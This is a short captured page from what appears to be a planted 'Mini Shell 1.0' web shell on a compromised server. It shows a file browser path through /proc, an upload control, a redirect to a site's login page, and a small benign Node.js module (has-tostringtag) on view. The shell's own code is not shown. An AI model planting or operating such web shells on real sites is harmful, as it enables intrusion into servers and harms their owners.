HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1784574/root/usr/share/nodejs/has-tostringtag/
Upload File :
Current File : //proc/1784574/root/usr/share/nodejs/has-tostringtag/index.js
'use strict';

var hasSymbols = require('has-symbols');

module.exports = function hasToStringTag() {
	return hasSymbols() && typeof Symbol.toStringTag === 'symbol';
};